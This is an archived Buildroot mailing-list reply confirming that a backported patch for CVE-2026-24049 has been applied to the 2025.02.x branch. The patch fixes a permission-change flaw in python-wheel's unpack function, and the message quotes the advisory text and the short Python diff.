From: Thomas Perale via buildroot <buildroot@buildroot.org>
To: Thomas Perale <thomas.perale@mind.be>
Cc: buildroot@buildroot.org
Subject: Re: [Buildroot] [2025.02.x, PATCH 2/2] package/python-wheel: patch CVE-2026-24049
Date: Fri, 27 Mar 2026 11:02:20 +0100 [thread overview]
Message-ID: <20260327100220.45873-1-thomas.perale@mind.be> (raw)
In-Reply-To: <20260316151301.268215-2-thomas.perale@mind.be>
In reply of:
> Fixes the following vulnerability:
>
> - CVE-2026-24049:
> wheel is a command line tool for manipulating Python wheel files, as
> defined in PEP 427. In versions 0.40.0 through 0.46.1, the unpack
> function is vulnerable to file permission modification through
> mishandling of file permissions after extraction. The logic blindly
> trusts the filename from the archive header for the chmod operation,
> even though the extraction process itself might have sanitized the
> path. Attackers can craft a malicious wheel file that, when unpacked,
> changes the permissions of critical system files (e.g., /etc/passwd,
> SSH keys, config files), allowing for Privilege Escalation or
> arbitrary code execution by modifying now-writable scripts. This issue
> has been fixed in version 0.46.2.
>
> For more information, see:
> - https://www.cve.org/CVERecord?id=CVE-2026-24049
> - https://github.com/advisories/GHSA-8rrh-rw8j-w5fx
>
> Signed-off-by: Thomas Perale <thomas.perale@mind.be>
Applied to 2025.02.x. Thanks
> ---
> ...d-security-issue-around-wheel-unpack.patch | 35 +++++++++++++++++++
> package/python-wheel/python-wheel.mk | 3 ++
> 2 files changed, 38 insertions(+)
> create mode 100644 package/python-wheel/0001-fixed-security-issue-around-wheel-unpack.patch
>
> diff --git a/package/python-wheel/0001-fixed-security-issue-around-wheel-unpack.patch b/package/python-wheel/0001-fixed-security-issue-around-wheel-unpack.patch
> new file mode 100644
> index 0000000000..8640dfa291
> --- /dev/null
> +++ b/package/python-wheel/0001-fixed-security-issue-around-wheel-unpack.patch
> @@ -0,0 +1,35 @@
> +From 7a7d2de96b22a9adf9208afcc9547e1001569fef Mon Sep 17 00:00:00 2001
> +From: =?UTF-8?q?Alex=20Gr=C3=B6nholm?= <alex.gronholm@nextday.fi>
> +Date: Thu, 22 Jan 2026 01:41:14 +0200
> +Subject: [PATCH] Fixed security issue around wheel unpack (#675)
> +
> +A maliciously crafted wheel could cause the permissions of a file outside the unpack tree to be altered.
> +
> +CVE: CVE-2026-24049
> +Upstream: https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef.patch
> +[thomas: change filename, remove tests]
> +Signed-off-by: Thomas Perale <thomas.perale@mind.be>
> +---
> + src/wheel/cli/unpack.py | 4 ++--
> + 3 files changed, 27 insertions(+), 2 deletions(-)
> +
> +diff --git a/src/wheel/cli/unpack.py b/src/wheel/cli/unpack.py
> +index d48840e6e..83dc7423f 100644
> +--- a/src/wheel/cli/unpack.py
> ++++ b/src/wheel/cli/unpack.py
> +@@ -19,12 +19,12 @@ def unpack(path: str, dest: str = ".") -> None:
> + destination = Path(dest) / namever
> + print(f"Unpacking to: {destination}...", end="", flush=True)
> + for zinfo in wf.filelist:
> +- wf.extract(zinfo, destination)
> ++ target_path = Path(wf.extract(zinfo, destination))
> +
> + # Set permissions to the same values as they were set in the archive
> + # We have to do this manually due to
> + # https://github.com/python/cpython/issues/59999
> + permissions = zinfo.external_attr >> 16 & 0o777
> +- destination.joinpath(zinfo.filename).chmod(permissions)
> ++ target_path.chmod(permissions)
> +
> + print("OK")
> +
> diff --git a/package/python-wheel/python-wheel.mk b/package/python-wheel/python-wheel.mk
> index 417db7c167..ae02d21feb 100644
> --- a/package/python-wheel/python-wheel.mk
> +++ b/package/python-wheel/python-wheel.mk
> @@ -13,4 +13,7 @@ PYTHON_WHEEL_LICENSE_FILES = LICENSE.txt
> PYTHON_WHEEL_CPE_ID_VENDOR = wheel_project
> PYTHON_WHEEL_CPE_ID_PRODUCT = wheel
>
> +# 0001-fixed-security-issue-around-wheel-unpack.patch
> +PYTHON_WHEEL_IGNORE_CVES += CVE-2026-24049
> +
> $(eval $(host-python-package))
> --
> 2.53.0
>
> _______________________________________________
> buildroot mailing list
> buildroot@buildroot.org
> https://lists.buildroot.org/mailman/listinfo/buildroot
_______________________________________________
buildroot mailing list
buildroot@buildroot.org
https://lists.buildroot.org/mailman/listinfo/buildroot
next prev parent reply other threads:[~2026-03-27 10:02 UTC|newest]
Thread overview: 4+ messages / expand[flat|nested] mbox.gz Atom feed top
2026-03-16 15:13 [Buildroot] [2025.02.x, PATCH 1/2] package/python-tornado: patch CVE-2025-67724, CVE-2025-67725, CVE-2025-67726 Thomas Perale via buildroot
2026-03-16 15:13 ` [Buildroot] [2025.02.x, PATCH 2/2] package/python-wheel: patch CVE-2026-24049 Thomas Perale via buildroot
2026-03-27 10:02 ` Thomas Perale via buildroot [this message]
2026-03-27 10:02 ` [Buildroot] [2025.02.x, PATCH 1/2] package/python-tornado: patch CVE-2025-67724, CVE-2025-67725, CVE-2025-67726 Thomas Perale via buildroot
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=20260327100220.45873-1-thomas.perale@mind.be \
--to=buildroot@buildroot.org \
--cc=thomas.perale@mind.be \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox